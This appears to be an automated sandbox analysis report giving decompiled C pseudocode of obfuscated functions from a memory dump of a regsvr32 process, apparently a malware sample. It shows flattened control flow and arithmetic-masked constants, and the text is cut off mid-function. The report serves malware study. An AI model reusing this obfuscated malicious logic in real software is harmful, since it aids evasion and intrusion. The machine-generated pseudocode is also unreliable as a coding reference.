:*, xrefs: 04B923D3

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )^^$:*$J;$b$f
API String ID: 0-204930537
Opcode ID: 795f6a45580268903b71d942dd16ccea15f8c4a4333e3d7f98810528a25477c4
Instruction ID: 365c7e3aef8da825e8f69be2b34799df243768df90b7cb92afdbd6d32cb9aaf5
Opcode Fuzzy Hash: 795f6a45580268903b71d942dd16ccea15f8c4a4333e3d7f98810528a25477c4
Instruction Fuzzy Hash: 5EF141B16083809FD768CF25D58AA4BFBF1FBC4718F10891DF1A98A260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04BA2009, Relevance: 6.5, Strings: 5, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04BA2009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E04B8556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E04B9654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E04B9E1F8(0x4b81080, _v1056, __eflags);
							_t320 = E04B8DC1B(_v1172);
							_t340 =  *0x4ba6214; // 0x0
							_t321 =  *0x4ba6214; // 0x0
							E04BA44AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E04B9FECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E04B9E1F8(0x4b81000, _v1156, __eflags);
					_t333 =  *0x4ba6214; // 0x0
					_t312 =  *0x4ba6214; // 0x0
					__eflags = _t312 + 0x23c;
					E04BA2D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E04B9FECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

0x04ba2009
0x04ba200f
0x04ba2019
0x04ba2024
0x04ba202f
0x04ba2037
0x04ba203f
0x04ba2044
0x04ba204c
0x04ba205e
0x04ba2063
0x04ba2069
0x04ba206e
0x04ba2073
0x04ba207b
0x04ba2083
0x04ba208b
0x04ba2093
0x04ba20a0
0x04ba20a1
0x04ba20a5
0x04ba20ad
0x04ba20b5
0x04ba20b9
0x04ba20be
0x04ba20c6
0x04ba20ce
0x04ba20d6
0x04ba20de
0x04ba20e6
0x04ba20ee
0x04ba20fc
0x04ba2100
0x04ba2108
0x04ba2110
0x04ba2115
0x04ba211a
0x04ba211f
0x04ba2127
0x04ba212f
0x04ba2134
0x04ba213c
0x04ba2144
0x04ba2149
0x04ba2151
0x04ba2159
0x04ba2161
0x04ba216e
0x04ba2172
0x04ba217a
0x04ba2182
0x04ba218a
0x04ba2192
0x04ba219a
0x04ba21a2
0x04ba21af
0x04ba21b3
0x04ba21bb
0x04ba21c3
0x04ba21c8
0x04ba21d0
0x04ba21d8
0x04ba21e0
0x04ba21e8
0x04ba21f0
0x04ba21f8
0x04ba2200
0x04ba2208
0x04ba2215
0x04ba2220
0x04ba222b
0x04ba2239
0x04ba223e
0x04ba2244
0x04ba224c
0x04ba2254
0x04ba225e
0x04ba2261
0x04ba2265
0x04ba226d
0x04ba2275
0x04ba227d
0x04ba2282
0x04ba228a
0x04ba2292
0x04ba22a2
0x04ba22a6
0x04ba22ab
0x04ba22b0
0x04ba22b8
0x04ba22c0
0x04ba22c5
0x04ba22cd
0x04ba22d8
0x04ba22e3
0x04ba22ee
0x04ba22f6
0x04ba22fe
0x04ba2306
0x04ba2311
0x04ba231c
0x04ba2327
0x04ba232f
0x04ba2337
0x04ba233f
0x04ba234c
0x04ba234f
0x04ba2353
0x04ba2357
0x04ba235c
0x04ba2364
0x04ba2374
0x04ba2378
0x04ba2380
0x04ba2388
0x04ba2390
0x04ba2398
0x04ba23a0
0x04ba23ab
0x04ba23b6
0x04ba23c1
0x04ba23cd
0x04ba23d0
0x04ba23d4
0x04ba23dc
0x04ba23e1
0x04ba23e9
0x04ba23f1
0x04ba23f9
0x04ba2401
0x04ba2406
0x04ba240e
0x04ba2416
0x04ba2423
0x04ba2427
0x04ba242f
0x04ba2437
0x04ba2442
0x04ba244d
0x04ba2460
0x04ba2474
0x04ba2474
0x04ba247e
0x00000000
0x04ba25e3
0x04ba2486
0x04ba2498
0x04ba24a1
0x04ba24a5
0x04ba24b0
0x04ba24bb
0x04ba24c7
0x04ba24de
0x04ba2506
0x04ba2523
0x04ba2528
0x04ba252b
0x00000000
0x04ba252b
0x04ba248e
0x00000000
0x00000000
0x04ba2494
0x04ba2494
0x04ba2532
0x04ba253b
0x04ba253f
0x04ba2547
0x04ba254c
0x04ba2571
0x04ba257d
0x04ba2587
0x04ba25a7
0x04ba25ac
0x04ba25af
0x04ba25b1
0x04ba25b1
0x04ba25b1
0x00000000

Strings

j8, xrefs: 04BA224C
qUO, xrefs: 04BA20DE
-9, xrefs: 04BA23B6
Hz, xrefs: 04BA23E9
XGH, xrefs: 04BA2390

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: j8$qUO$-9$Hz$XGH
API String ID: 0-60989354
Opcode ID: 5176f3366df518d30cade5bcbba88d6b3f948cfeb1863ddc831d9954fbe79256
Instruction ID: bef349c556e637ddfa8a1b643078417ef333dd6e32dba88103f20d98745b3f18
Opcode Fuzzy Hash: 5176f3366df518d30cade5bcbba88d6b3f948cfeb1863ddc831d9954fbe79256
Instruction Fuzzy Hash: A1E131715097809FC3A8CF24C98AA4BBBF1FBC4758F508A1DF5E986260D7B49958CF42

Uniqueness

Uniqueness Score: -1.00%

Function 04BA3EE9, Relevance: 6.5, Strings: 5, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04BA3EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E04B9E1F8(0x4b81758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								E04B8F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E04B9FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0x4ba6228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E04B93D85( *(_t344 + 0x60), 0x4ba6000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												E04BA2B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E04B8C5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0x4ba6228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0x4ba6228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}

0x04ba3eec
0x04ba3ef3
0x04ba3ef8
0x04ba3efd
0x04ba3f05
0x04ba3f0d
0x04ba3f15
0x04ba3f1d
0x04ba3f2e
0x04ba3f38
0x04ba3f3d
0x04ba3f43
0x04ba3f48
0x04ba3f50
0x04ba3f58
0x04ba3f60
0x04ba3f65
0x04ba3f6d
0x04ba3f75
0x04ba3f7e
0x04ba3f83
0x04ba3f89
0x04ba3f91
0x04ba3f99
0x04ba3fa1
0x04ba3fa6
0x04ba3fae
0x04ba3fba
0x04ba3fbf
0x04ba3fc5
0x04ba3fca
0x04ba3fd2
0x04ba3fda
0x04ba3fe6
0x04ba3feb
0x04ba3ff5
0x04ba3ff8
0x04ba3ffc
0x04ba4004
0x04ba400c
0x04ba4014
0x04ba401c
0x04ba4024
0x04ba402c
0x04ba4034
0x04ba403c
0x04ba4041
0x04ba4049
0x04ba4051
0x04ba4059
0x04ba4061
0x04ba4069
0x04ba4071
0x04ba4079
0x04ba4086
0x04ba408a
0x04ba4094
0x04ba40a3
0x04ba40a4
0x04ba40a8
0x04ba40ac
0x04ba40b0
0x04ba40b8
0x04ba40c0
0x04ba40c5
0x04ba40ca
0x04ba40d2
0x04ba40da
0x04ba40e2
0x04ba40ea
0x04ba40f2
0x04ba4100
0x04ba4104
0x04ba410c
0x04ba4114
0x04ba411c
0x04ba4124
0x04ba4129
0x04ba4131
0x04ba4139
0x04ba4141
0x04ba4149
0x04ba4151
0x04ba4159
0x04ba415e
0x04ba4166
0x04ba416e
0x04ba4176
0x04ba417b
0x04ba4188
0x04ba418c
0x04ba4194
0x04ba419c
0x04ba41a4
0x04ba41ac
0x04ba41b4
0x04ba41b9
0x04ba41c1
0x04ba41c9
0x04ba41d1
0x04ba41d9
0x04ba41e1
0x04ba41e6
0x04ba41ee
0x04ba41ee
0x04ba41ee
0x04ba41f2
0x04ba41f2
0x04ba41f2
0x00000000
0x04ba41f6
0x04ba4208
0x04ba42d3
0x04ba42df
0x04ba42e5
0x04ba42f0
0x04ba42f7
0x04ba42fb
0x04ba430a
0x04ba4335
0x04ba433a
0x04ba4352
0x04ba435b
0x04ba4369
0x04ba436d
0x04ba4370
0x04ba4373
0x04ba437c
0x04ba4388
0x00000000
0x04ba420e
0x04ba4214
0x04ba42bc
0x04ba42c2
0x04ba42c7
0x04ba42ca
0x00000000
0x04ba421a
0x04ba4220
0x04ba4299
0x04ba429e
0x04ba42a2
0x04ba42a5
0x04ba42a9
0x04ba42ae
0x04ba42b2
0x00000000
0x04ba4222
0x04ba4228
0x04ba4272
0x04ba4274
0x04ba427c
0x00000000
0x04ba422a
0x04ba4230
0x04ba43c4
0x04ba4236
0x04ba423c
0x04ba43a7
0x04ba43a7
0x04ba43ad
0x04ba41f2
0x04ba41f2
0x00000000
0x04ba41f2
0x04ba4242
0x04ba4252
0x04ba4253
0x04ba425b
0x04ba425d
0x04ba4262
0x04ba4268
0x04ba41ee
0x04ba41ee
0x04ba41ee
0x04ba41f2
0x04ba41f2
0x04ba41f2
0x00000000
0x04ba41f2
0x04ba41f2
0x04ba41ee
0x04ba4262
0x04ba423c
0x04ba4230
0x04ba4228
0x04ba4220
0x04ba4214
0x04ba43cb
0x04ba43d7
0x04ba43db
0x04ba43e0
0x04ba43e5
0x04ba43e5
0x04ba4391
0x04ba4396
0x04ba439b
0x04ba439d
0x04ba43a0
0x04ba43a4
0x04ba43a4
0x04ba43a4
0x00000000
0x04ba43a4
0x04ba41f2

Strings

z}, xrefs: 04BA422A
r', xrefs: 04BA433A
q(, xrefs: 04BA40E2
y%, xrefs: 04BA4129
ldM', xrefs: 04BA41E6

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ldM'$q($r'$y%$z}
API String ID: 0-1771948706
Opcode ID: 66add32f173fde251b1b544f63b7ea83d9ad4fc68672cc1d926dde031ff82149
Instruction ID: 58d829be09465e54e701f1398811871afb62ab8892bc9936283dda9588bb6835
Opcode Fuzzy Hash: 66add32f173fde251b1b544f63b7ea83d9ad4fc68672cc1d926dde031ff82149
Instruction Fuzzy Hash: 51D1407110C3809FD368CF25C48955BBFE2FB95358F148A0EF2A696260D3B5D919CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B8FB8E, Relevance: 6.5, Strings: 5, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B8FB8E(void* __ecx, intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
